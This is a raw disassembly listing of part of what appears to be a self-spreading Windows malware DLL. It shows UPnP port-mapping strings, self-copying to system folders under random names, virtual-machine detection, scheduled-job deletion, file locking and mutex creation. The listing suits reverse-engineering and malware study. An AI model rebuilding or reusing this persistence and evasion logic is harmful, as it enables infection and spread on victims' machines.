aNewinternalcli db 'NewInternalClient',0 ; DATA XREF: sub_9B6663+81�o
; sub_9B686F+FF�o ...
align 4
; char aNewinternalpor[]
aNewinternalpor db 'NewInternalPort',0 ; DATA XREF: sub_9B6663+7A�o
; sub_9B686F+125�o ...
; char aNewprotocol[]
aNewprotocol db 'NewProtocol',0 ; DATA XREF: sub_9B6663+70�o
; sub_9B679A+62�o ...
; char aNewexternalpor[]
aNewexternalpor db 'NewExternalPort',0 ; DATA XREF: sub_9B6663+66�o
; sub_9B679A+56�o ...
; char aNewremotehost[]
aNewremotehost db 'NewRemoteHost',0 ; DATA XREF: sub_9B6663+60�o
; sub_9B679A+4D�o ...
align 4
aDeleteportmapp db 'DeletePortMapping',0 ; DATA XREF: sub_9B679A+45�o
align 4
aNewportmappi_0 db 'NewPortMappingIndex',0 ; DATA XREF: sub_9B686F+5A�o
aGetgenericport db 'GetGenericPortMappingEntry',0 ; DATA XREF: sub_9B686F+4C�o
align 4
aGetspecificpor db 'GetSpecificPortMappingEntry',0 ; DATA XREF: sub_9B6A70+5D�o
dd 89ABCDEFh, 1234567h, 2425CFA0h, 7311C281h
; ---------------------------------------------------------------------------
loc_9A70D8: ; DATA XREF: sub_9B7937+B6�o
mov al, ds:812425CFh
retn 7311h
; ---------------------------------------------------------------------------
dd 34AAC8E7h, 64322864h, 0EF68B7C1h, 0B60450E9h, 8D9F06F1h
dd 0E8FB2390h, 0A691E5BFh, 0DD2E76CBh, 2C30BC41h, 0CD0D63Bh
dd 23058F8Ah, 1F8CCF68h, 88E3775Dh, 54E5ED5Bh, 0A6D6031h
dd 4AD12AAEh, 88222E0Dh, 3E7F16BBh, 3FB50C2Ch, 8AF8671Dh
dd 8BD25C31h, 995AD117h, 4C4B633h, 0C878C1DDh, 7A1552ACh
dd 3B72066Ch, 631EFFCBh, 0D6F3522h
byte_9A7150 db 30h ; DATA XREF: sub_9B7CA3+38�r
; sub_9B7CA3+4B�r
a123456789abcde db '123456789abcdef',0
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A7170 proc near ; CODE XREF: StartAddress:loc_9A77D0�p
VersionInformation= _OSVERSIONINFOA ptr -0A0h
var_C = word ptr -0Ch
Data = byte ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 0A0h
push ebx
push esi
push edi
push 26h
pop ecx
xor eax, eax
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
lea edi, [ebp+78h+VersionInformation.dwMajorVersion]
rep stosd
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
mov dword ptr [ebp+78h+Data], 0Ah
call GetVersionExA
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnz short loc_9A71FC
cmp [ebp+78h+VersionInformation.dwMinorVersion], 0
jz short loc_9A71B9
cmp [ebp+78h+VersionInformation.dwMinorVersion], 1
jnz short loc_9A71FC
cmp [ebp+78h+var_C], 2
jnb short loc_9A71FC
loc_9A71B9: ; CODE XREF: sub_9A7170+3A�j
lea eax, [ebp+78h+Data]
push eax ; lpData
mov ebx, offset dword_9A1484
push ebx ; lpValueName
mov edi, offset dword_9A1450
push edi ; lpSubKey
mov esi, 80000002h
push esi ; int
call sub_9AD112
add esp, 10h
test eax, eax
jnz short loc_9A71E4
mov dword ptr [ebp+78h+Data], 0FFFFFEh
jmp short loc_9A721A
; ---------------------------------------------------------------------------
loc_9A71E4: ; CODE XREF: sub_9A7170+69�j
mov eax, 0FFFFFEh
cmp dword ptr [ebp+78h+Data], eax
jz short loc_9A721A
push eax ; Data
push ebx ; lpValueName
push edi ; lpSubKey
push esi ; hKey
call sub_9AD0F4
add esp, 10h
jmp short loc_9A721A
; ---------------------------------------------------------------------------
loc_9A71FC: ; CODE XREF: sub_9A7170+34�j
; sub_9A7170+40�j ...
push 1 ; int
push offset Name ; lpName
call sub_9AC5D7
pop ecx
pop ecx
call sub_9A812E
test eax, eax
jz short loc_9A721A
mov dword ptr [ebp+78h+Data], 10000000h
loc_9A721A: ; CODE XREF: sub_9A7170+72�j
; sub_9A7170+7C�j ...
mov eax, dword ptr [ebp+78h+Data]
pop edi
pop esi
mov dword_9BAE64, eax
pop ebx
add ebp, 78h
leave
retn
sub_9A7170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A722A proc near ; CODE XREF: StartAddress+25�p
; StartAddress+92�p ...
Str1 = byte ptr -208h
Str = byte ptr -104h
var_103 = byte ptr -103h
push ebp
mov ebp, esp
sub esp, 208h
push ebx
push esi
push edi
push 40h
xor eax, eax
pop ecx
xor ebx, ebx
mov [ebp+Str], bl
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
lea eax, [ebp+Str]
push eax ; Str
mov esi, offset FileName ; "c:\\c.dll"
push esi ; Source
call sub_9AD279
pop ecx
pop ecx
push 104h ; uSize
lea eax, [ebp+Str1]
push eax ; lpBuffer
call GetSystemDirectoryA
push 3 ; MaxCount
lea eax, [ebp+Str]
push eax ; Str
lea eax, [ebp+Str1]
push eax ; Str1
call _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_9A72C0
push esi ; Str
call strlen
cmp eax, 4
pop ecx
jbe short loc_9A72BB
push offset dword_9A1498 ; Str2
push esi ; Str
call strlen
sub esi, 4
pop ecx
add eax, esi
push eax ; Str1
call _stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_9A72C3
loc_9A72BB: ; CODE XREF: sub_9A722A+71�j
or ebx, 0FFFFFFFFh
jmp short loc_9A72C3
; ---------------------------------------------------------------------------
loc_9A72C0: ; CODE XREF: sub_9A722A+65�j
push 0FFFFFFFEh
pop ebx
loc_9A72C3: ; CODE XREF: sub_9A722A+8F�j
; sub_9A722A+94�j
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9A722A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A72CA proc near ; CODE XREF: sub_9A798D+118�p
pSid1 = dword ptr -28h
var_24 = dword ptr -24h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -20h
var_18 = dword ptr -18h
hObject = dword ptr -14h
var_10 = dword ptr -10h
ReturnLength = dword ptr -0Ch
pSid2 = dword ptr -8
pSid = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
push ebx
lea eax, [ebp+hObject]
push eax ; TokenHandle
xor ebx, ebx
push 8 ; DesiredAccess
mov [ebp+var_18], ebx
call GetCurrentProcess
push eax ; ProcessHandle
call OpenProcessToken
test eax, eax
jz loc_9A740A
push esi
mov esi, GetTokenInformation
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push ebx ; TokenInformationLength
push ebx ; TokenInformation
push 2 ; TokenInformationClass
push [ebp+hObject] ; TokenHandle
call esi ; GetTokenInformation
test eax, eax
jnz loc_9A7400
call GetLastError
cmp eax, 7Ah
jnz loc_9A7400
push edi
push [ebp+ReturnLength] ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
cmp edi, ebx
jz loc_9A73FF
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push [ebp+ReturnLength] ; TokenInformationLength
push edi ; TokenInformation
push 2 ; TokenInformationClass
push [ebp+hObject] ; TokenHandle
call esi ; GetTokenInformation
test eax, eax
jz loc_9A73F8
mov esi, AllocateAndInitializeSid
lea eax, [ebp+pSid2]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 4 ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
mov [ebp+pSid2], ebx
mov [ebp+pSid], ebx
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 5
call esi ; AllocateAndInitializeSid
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 6 ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call esi ; AllocateAndInitializeSid
cmp [edi], ebx
mov [ebp+var_18], 1
mov [ebp+var_10], ebx
jbe short loc_9A73DE
lea esi, [edi+4]
loc_9A73A3: ; CODE XREF: sub_9A72CA+10D�j
mov eax, [esi]
push [ebp+pSid2] ; pSid2
mov ecx, [esi+4]
push eax ; pSid1
mov [ebp+pSid1], eax
mov [ebp+var_24], ecx
call EqualSid
test eax, eax
jnz short loc_9A73DB
push [ebp+pSid] ; pSid2
push [ebp+pSid1] ; pSid1
call EqualSid
test eax, eax
jnz short loc_9A73DE
inc [ebp+var_10]
mov eax, [ebp+var_10]
add esi, 8
cmp eax, [edi]
jb short loc_9A73A3
jmp short loc_9A73DE
; ---------------------------------------------------------------------------
loc_9A73DB: ; CODE XREF: sub_9A72CA+F0�j
mov [ebp+var_18], ebx
loc_9A73DE: ; CODE XREF: sub_9A72CA+D4�j
; sub_9A72CA+100�j ...
cmp [ebp+pSid], ebx
mov esi, FreeSid
jz short loc_9A73EE
push [ebp+pSid] ; pSid
call esi ; FreeSid
loc_9A73EE: ; CODE XREF: sub_9A72CA+11D�j
cmp [ebp+pSid2], ebx
jz short loc_9A73F8
push [ebp+pSid2] ; pSid
call esi ; FreeSid
loc_9A73F8: ; CODE XREF: sub_9A72CA+79�j
; sub_9A72CA+127�j
push edi ; hMem
call GlobalFree
loc_9A73FF: ; CODE XREF: sub_9A72CA+62�j
pop edi
loc_9A7400: ; CODE XREF: sub_9A72CA+3D�j
; sub_9A72CA+4C�j
push [ebp+hObject] ; hObject
call CloseHandle
pop esi
loc_9A740A: ; CODE XREF: sub_9A72CA+21�j
mov eax, [ebp+var_18]
pop ebx
leave
retn
sub_9A72CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7410 proc near ; CODE XREF: sub_9A798D+17B�p
First = byte ptr -114h
TotalEntries = dword ptr -10h
var_C = dword ptr -0Ch
EntriesRead = dword ptr -8
Buffer = dword ptr -4
push ebp
mov ebp, esp
sub esp, 114h
push esi
xor esi, esi
push esi ; ResumeHandle
lea eax, [ebp+TotalEntries]
push eax ; TotalEntries
lea eax, [ebp+EntriesRead]
push eax ; EntriesRead
push 0FFFFFFFFh ; PrefferedMaximumLength
lea eax, [ebp+Buffer]
push eax ; PointerToBuffer
push esi ; Servername
mov [ebp+EntriesRead], esi
mov [ebp+Buffer], esi
call NetScheduleJobEnum
cmp [ebp+EntriesRead], esi
mov [ebp+var_C], esi
jbe loc_9A74D1
push ebx
push edi
xor ebx, ebx
loc_9A7447: ; CODE XREF: sub_9A7410+B9�j
push esi ; lpUsedDefaultChar
push esi ; lpDefaultChar
push 104h ; cbMultiByte
lea eax, [ebp+First]
push eax ; lpMultiByteStr
mov eax, [ebp+Buffer]
push 0FFFFFFFFh ; cchWideChar
push dword ptr [ebx+eax+10h] ; lpWideCharStr
push esi ; dwFlags
push esi ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9A74BD
push 5Ch ; Ch
push offset FileName ; "c:\\c.dll"
call strrchr
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jnz short loc_9A7486
mov edi, offset FileName ; "c:\\c.dll"
jmp short loc_9A7487
; ---------------------------------------------------------------------------
loc_9A7486: ; CODE XREF: sub_9A7410+6D�j
inc edi
loc_9A7487: ; CODE XREF: sub_9A7410+74�j
push offset Srch ; lpSrch
lea eax, [ebp+First]
push eax ; lpFirst
call StrStrIA
test eax, eax
jz short loc_9A74BD
push edi ; lpSrch
lea eax, [ebp+First]
push eax ; lpFirst
call StrStrIA
test eax, eax
jz short loc_9A74BD
mov eax, [ebp+Buffer]
mov eax, [ebx+eax]
push eax ; MaxJobId
push eax ; MinJobId
push esi ; Servername
call NetScheduleJobDel
loc_9A74BD: ; CODE XREF: sub_9A7410+58�j
; sub_9A7410+8B�j ...
inc [ebp+var_C]
mov eax, [ebp+var_C]
add ebx, 14h
cmp eax, [ebp+EntriesRead]
jb loc_9A7447
pop edi
pop ebx
loc_9A74D1: ; CODE XREF: sub_9A7410+2D�j
cmp [ebp+Buffer], esi
pop esi
jz short locret_9A74DF
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
locret_9A74DF: ; CODE XREF: sub_9A7410+C5�j
leave
retn
sub_9A7410 endp
; =============== S U B R O U T I N E =======================================
sub_9A74E1 proc near ; CODE XREF: sub_9A798D+13B�p
push esi
push edi
push offset dword_9A14C0 ; lpSrch
xor edi, edi
call sub_9ACF3E
test eax, eax
pop ecx
mov esi, offset FileName ; "c:\\c.dll"
jz short loc_9A7506
push esi ; lpBuffer
push eax ; dwProcessId
call sub_9ACC9F
test eax, eax
pop ecx
pop ecx
jnz short loc_9A7522
loc_9A7506: ; CODE XREF: sub_9A74E1+16�j
push offset dword_9A14B0 ; Str2
call sub_9ACC1F
test eax, eax
pop ecx
jz short loc_9A7525
push esi ; lpBuffer
push eax ; dwProcessId
call sub_9ACC9F
test eax, eax
pop ecx
pop ecx
jz short loc_9A7525
loc_9A7522: ; CODE XREF: sub_9A74E1+23�j
xor edi, edi
inc edi
loc_9A7525: ; CODE XREF: sub_9A74E1+32�j
; sub_9A74E1+3F�j
mov eax, edi
pop edi
pop esi
retn
sub_9A74E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A752A proc near ; CODE XREF: sub_9A7670+6E�p
; sub_9A7670+C7�p ...
NewFileName = byte ptr -120h
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
hMem = dword ptr -0Ch
nNumberOfBytesToWrite= dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 120h
mov eax, dword_9BAF74
push ebx
push esi
xor eax, 45419005h
push edi
push eax ; Seed
call srand
call rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_1C]
add edx, 5
push edx
push eax
call sub_9AC642
call sub_9AC50B
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
mov edi, 104h
push offset aF ; "”"
lea eax, [ebp+NewFileName]
push edi ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+NewFileName]
push 1F01FFh ; int
xor ebx, ebx
push eax ; lpFileName
mov [ebp+var_1D], bl
call sub_9AD15E
add esp, 28h
cmp [ebp+arg_4], 0FFFFFFFFh
mov [ebp+var_4], ebx
mov esi, offset FileName ; "c:\\c.dll"
jnz short loc_9A75C6
lea eax, [ebp+NewFileName]
push eax ; lpNewFileName
push esi ; lpExistingFileName
call MoveFileA
test eax, eax
jz short loc_9A75C6
mov [ebp+var_4], 1
jmp short loc_9A7621
; ---------------------------------------------------------------------------
loc_9A75C6: ; CODE XREF: sub_9A752A+7F�j
; sub_9A752A+91�j
lea eax, [ebp+nNumberOfBytesToWrite]
push esi ; lpFileName
push eax ; int
mov [ebp+nNumberOfBytesToWrite], ebx
call sub_9AC769
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+hMem], eax
jz loc_9A7668
cmp [ebp+nNumberOfBytesToWrite], ebx
jz short loc_9A7613
lea ecx, [ebp+NewFileName]
push ecx ; lpFileName
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push eax ; lpBuffer
call sub_9AC7F0
add esp, 0Ch
test eax, eax
jz short loc_9A7613
cmp [ebp+arg_4], 0FFFFFFFFh
mov [ebp+var_4], 1
jnz short loc_9A7613
push 4 ; dwFlags
push ebx ; lpNewFileName
push esi ; lpExistingFileName
call MoveFileExA
loc_9A7613: ; CODE XREF: sub_9A752A+B9�j
; sub_9A752A+D0�j ...
push [ebp+hMem] ; hMem
call GlobalFree
cmp [ebp+var_4], ebx
jz short loc_9A7668
loc_9A7621: ; CODE XREF: sub_9A752A+9A�j
lea eax, [ebp+NewFileName]
push eax ; lpFileName
call sub_9AC6A4
lea eax, [ebp+NewFileName]
push eax ; lpMultiByteStr
call sub_9AE850
push edi ; Count
lea eax, [ebp+NewFileName]
push eax ; Source
push esi ; Dest
call strncpy
add esp, 14h
mov byte_9BAF6B, bl
call GetVersion
cmp al, 6
jb short loc_9A7668
push ebx ; int
push offset CommandLine ; lpCommandLine
call sub_9AD3A7
pop ecx
pop ecx
loc_9A7668: ; CODE XREF: sub_9A752A+B0�j
; sub_9A752A+F5�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_9A752A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7670 proc near ; CODE XREF: StartAddress+31�p
Buffer = byte ptr -104h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
sldt ax
xor ebx, ebx
cmp ax, bx
jz short loc_9A76C1
cmp [ebp+arg_0], 0FFFFFFFEh
mov esi, offset FileName ; "c:\\c.dll"
jz short loc_9A76B4
push 1F01FFh ; int
push esi ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
push 4 ; dwFlags
push ebx ; lpNewFileName
push esi ; lpExistingFileName
call MoveFileExA
loc_9A76A7: ; CODE XREF: sub_9A7670+4F�j
cmp [ebp+arg_0], 0FFFFFFFEh
jz short loc_9A76B4
push esi ; lpFileName
call DeleteFileA
loc_9A76B4: ; CODE XREF: sub_9A7670+1E�j
; sub_9A7670+3B�j
push 1388h ; dwMilliseconds
call Sleep
jmp short loc_9A76A7
; ---------------------------------------------------------------------------
loc_9A76C1: ; CODE XREF: sub_9A7670+13�j
mov esi, 104h
push esi ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call GetSystemDirectoryA
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
call sub_9A752A
test eax, eax
pop ecx
pop ecx
jnz loc_9A7785
push edi
mov edi, SHGetSpecialFolderPathA
push ebx ; fCreate
push 26h ; csidl
lea eax, [ebp+Buffer]
push eax ; pszPath
push ebx ; hwnd
call edi ; SHGetSpecialFolderPathA
call rand
cdq
push 2
pop ecx
idiv ecx
mov eax, offset Source
test edx, edx
jnz short loc_9A771B
mov eax, offset dword_9A1530
loc_9A771B: ; CODE XREF: sub_9A7670+A4�j
push esi ; Count
push eax ; Source
lea eax, [ebp+Buffer]
push eax ; Dest
call strncat
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
mov [ebp+var_1], bl
call sub_9A752A
add esp, 14h
test eax, eax
jnz short loc_9A7784
push ebx ; fCreate
push 1Ah ; csidl
lea eax, [ebp+Buffer]
push eax ; pszPath
push ebx ; hwnd
call edi ; SHGetSpecialFolderPathA
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
call sub_9A752A
test eax, eax
pop ecx
pop ecx
jnz short loc_9A7784
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push esi ; nBufferLength
call GetTempPathA
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
call sub_9A752A
pop ecx
pop ecx
loc_9A7784: ; CODE XREF: sub_9A7670+D1�j
; sub_9A7670+F3�j
pop edi
loc_9A7785: ; CODE XREF: sub_9A7670+77�j
pop esi
pop ebx
leave
retn
sub_9A7670 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: sub_9A798D+1FF�o
var_1AC = dword ptr -1ACh
dwFlags = dword ptr -198h
var_194 = dword ptr -194h
WSAData = WSAData ptr -190h
sub esp, 198h
push ebx
push ebp
push esi
push edi
push 8003h ; uMode
call SetErrorMode
call sub_9AC50B
push offset CriticalSection ; lpCriticalSection
call sub_9A8B47
pop ecx
call sub_9A722A
xor esi, esi
cmp eax, esi
jge short loc_9A77C0
push eax
call sub_9A7670
pop ecx
loc_9A77C0: ; CODE XREF: StartAddress+2E�j
sldt ax
cmp ax, si
jz short loc_9A77D0
push 0FFFFFFFFh ; dwMilliseconds
call Sleep
loc_9A77D0: ; CODE XREF: StartAddress+3D�j
call sub_9A7170
call GetVersion
cmp ax, 5
jnz short loc_9A7803
call sub_9AB59B
lea eax, [esp+1A8h+dwFlags]
push eax ; lpThreadId
push esi ; dwCreationFlags
push esi ; lpParameter
push offset sub_9A90F2 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
jmp short loc_9A7808
; ---------------------------------------------------------------------------
loc_9A7803: ; CODE XREF: StartAddress+56�j
call sub_9AB567
loc_9A7808: ; CODE XREF: StartAddress+78�j
push offset dword_9BAF78
call sub_9A91E7
pop ecx
mov [esp+1A8h+dwFlags], esi
mov [esp+1A8h+var_194], esi
call sub_9A722A
cmp eax, 0FFFFFFFEh
mov edi, offset FileName ; "c:\\c.dll"
jz short loc_9A7837
push 120089h ; int
push edi ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
loc_9A7837: ; CODE XREF: StartAddress+9F�j
push edi ; lpFileName
push offset nNumberOfBytesToWrite ; int
call sub_9AC769
cmp eax, esi
pop ecx
pop ecx
mov lpBuffer, eax
jz short loc_9A787E
mov ecx, [eax+3Ch]
add ecx, eax
movzx edx, word ptr [ecx+6]
lea edx, [edx+edx*4]
lea edx, [ecx+edx*8+0F8h]
mov ecx, [edx-18h]
add ecx, [edx-14h]
mov edx, nNumberOfBytesToWrite
cmp edx, ecx
jbe short loc_9A7886
add eax, ecx
sub edx, ecx
mov [esp+1A8h+dwFlags], eax
mov [esp+1A8h+var_194], edx
jmp short loc_9A7886
; ---------------------------------------------------------------------------
loc_9A787E: ; CODE XREF: StartAddress+C2�j
push 0FFFFFFFFh ; dwMilliseconds
call Sleep
loc_9A7886: ; CODE XREF: StartAddress+E5�j
; StartAddress+F3�j
mov ebx, CreateFileA
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 2 ; dwShareMode
mov ebp, 80000000h
push ebp ; dwDesiredAccess
push edi ; lpFileName
call ebx ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_9A78B7
xor eax, eax
push eax ; hTemplateFile
push eax ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push eax ; lpSecurityAttributes
push 3 ; dwShareMode
push ebp ; dwDesiredAccess
push edi ; lpFileName
call ebx ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A78CE
loc_9A78B7: ; CODE XREF: StartAddress+118�j
xor ebp, ebp
push ebp ; nNumberOfBytesToLockHigh
push ebp ; lpFileSizeHigh
push esi ; hFile
call GetFileSize
push eax ; nNumberOfBytesToLockLow
push ebp ; dwFileOffsetHigh
push ebp ; dwFileOffsetLow
push esi ; hFile
call LockFile
jmp short loc_9A78D0
; ---------------------------------------------------------------------------
loc_9A78CE: ; CODE XREF: StartAddress+12C�j
xor ebp, ebp
loc_9A78D0: ; CODE XREF: StartAddress+143�j
call sub_9A722A
cmp eax, 0FFFFFFFEh
jz short loc_9A78E4
push 20h ; int
push edi ; lpFileName
call sub_9AD15E
pop ecx
pop ecx
loc_9A78E4: ; CODE XREF: StartAddress+14F�j
push offset ServiceName ; lpServiceName
call sub_9AC553
mov [esp+1ACh+var_1AC], offset dword_9A1554
call sub_9AC553
mov edi, Sleep
mov [esp+1ACh+var_1AC], 3A98h
call edi ; Sleep
lea eax, [esp+1A8h+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call WSAStartup
call sub_9AFE8D
test eax, eax
jz short loc_9A793B
push [esp+1A8h+var_194]
push [esp+1ACh+dwFlags]
call sub_9B0216
pop ecx
pop ecx
call sub_9A99DA
call sub_9AE102
loc_9A793B: ; CODE XREF: StartAddress+197�j
call sub_9AC2BE
push 1B7740h ; dwMilliseconds
loc_9A7945: ; CODE XREF: StartAddress+202�j
call edi ; Sleep
loc_9A7947: ; CODE XREF: StartAddress+1FB�j
push ebp ; dwReserved
lea eax, [esp+1ACh+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jz short loc_9A7986
call sub_9AEECE
call sub_9AD569
push 12h
pop ebx
loc_9A7964: ; CODE XREF: StartAddress+1F9�j
push 927C0h ; dwMilliseconds
call edi ; Sleep
push 64h ; int
mov esi, offset CriticalSection
push esi ; lpCriticalSection
call sub_9A8C5D
push esi ; lpCriticalSection
call sub_9A8BC6
add esp, 0Ch
dec ebx
jnz short loc_9A7964
jmp short loc_9A7947
; ---------------------------------------------------------------------------
loc_9A7986: ; CODE XREF: StartAddress+1CC�j
push 0EA60h
jmp short loc_9A7945
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A798D(HMODULE hModule)
sub_9A798D proc near ; CODE XREF: DllMain(x,x,x)+8E�p
Name = byte ptr -210h
var_111 = byte ptr -111h
Str = byte ptr -110h
var_10F = byte ptr -10Fh
var_10 = dword ptr -10h
ThreadId = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hModule = dword ptr 8
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push 3Fh
xor eax, eax
xor ebx, ebx
mov [ebp+Str], bl
pop ecx
lea edi, [ebp+var_10F]
rep stosd
stosw
stosb
call sub_9ACFF6
call sub_9AB49A
push 104h ; nSize
mov edi, offset FileName ; "c:\\c.dll"
push edi ; lpFilename
push [ebp+hModule] ; hModule
call GetModuleFileNameA
push 1 ; int
push offset aUmservicesstat ; "umServicesStatusW"
mov byte_9BAF6B, bl
call sub_9AC5D7
pop ecx
pop ecx
lea eax, [ebp+ThreadId]
push eax ; nSize
lea eax, [ebp+Str]
mov esi, 100h
push eax ; lpBuffer
mov [ebp+ThreadId], esi
call GetComputerNameA
lea eax, [ebp+Str]
push eax ; Str
call strlen
push eax
lea eax, [ebp+Str]
push eax
call sub_9A9237
mov dword_9BAF74, eax
xor eax, 2F53508Bh
push eax ; Seed
call srand
call rand
push 3
pop ecx
cdq
idiv ecx
add edx, 6
push edx
push offset aMarnwkcw ; "marnwkcw"
call sub_9AC642
call sub_9AC50B
push 7
push dword_9BAF74
lea eax, [ebp+Name]
push offset Format ; "SCManagerW"
push esi ; Count
push eax ; Dest
call _snprintf
add esp, 2Ch
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialOwner
push ebx ; lpMutexAttributes
mov [ebp+var_111], bl
call CreateMutexA
mov hObject, eax
call GetLastError
mov [ebp+var_8], eax
call GetCommandLineA
mov esi, StrStrIA
push offset Srch
push eax
mov [ebp+var_4], eax
call esi ; StrStrIA
test eax, eax
jz loc_9A7B29
call sub_9A72CA
cmp [ebp+var_8], 0B7h
mov [ebp+var_10], eax
jz short loc_9A7B03
cmp [ebp+var_8], 5
jz short loc_9A7B03
push hObject ; hObject
call CloseHandle
call sub_9A74E1
test eax, eax
jz short loc_9A7B03
xor edi, edi
loc_9A7AD3: ; CODE XREF: sub_9A798D+174�j
push 0BB8h ; dwMilliseconds
call Sleep
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInheritHandle
push 1 ; dwDesiredAccess
call OpenMutexA
test eax, eax
jnz short loc_9A7B03
call GetLastError
cmp eax, 5
jz short loc_9A7B03
inc edi
cmp edi, 3
jl short loc_9A7AD3
loc_9A7B03: ; CODE XREF: sub_9A798D+127�j
; sub_9A798D+12D�j ...
cmp [ebp+var_10], ebx
jz short loc_9A7B0F
call sub_9A7410
jmp short loc_9A7B22
; ---------------------------------------------------------------------------
loc_9A7B0F: ; CODE XREF: sub_9A798D+179�j
push offset aMarnwkcw ; "marnwkcw"
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jnz short loc_9A7B22
call sub_9AC1ED
loc_9A7B22: ; CODE XREF: sub_9A798D+180�j
; sub_9A798D+18E�j
push ebx ; uExitCode
call ExitProcess
; ---------------------------------------------------------------------------
loc_9A7B29: ; CODE XREF: sub_9A798D+112�j
call GetVersion
cmp ax, 5
jnz short loc_9A7B4F
push offset aYsecurity ; "ySecurity"
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jz short loc_9A7B4F
call sub_9AB47D
call sub_9AB535
jmp short loc_9A7B77
; ---------------------------------------------------------------------------
loc_9A7B4F: ; CODE XREF: sub_9A798D+1A6�j
; sub_9A798D+1B4�j
push offset aRegopenkeyexw ; "RegOpenKeyExW"
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jz short loc_9A7B64
call sub_9AB47D
jmp short loc_9A7B77
; ---------------------------------------------------------------------------
loc_9A7B64: ; CODE XREF: sub_9A798D+1CE�j
push offset dword_9A1568
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jz short loc_9A7B77
call sub_9AB4B7
loc_9A7B77: ; CODE XREF: sub_9A798D+1C0�j
; sub_9A798D+1D5�j ...
cmp [ebp+var_8], 0B7h
jz short loc_9A7BA2
cmp [ebp+var_8], 5
jz short loc_9A7BA2
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset StartAddress ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
jmp short loc_9A7BB6
; ---------------------------------------------------------------------------
loc_9A7BA2: ; CODE XREF: sub_9A798D+1F1�j
; sub_9A798D+1F7�j
call sub_9A722A
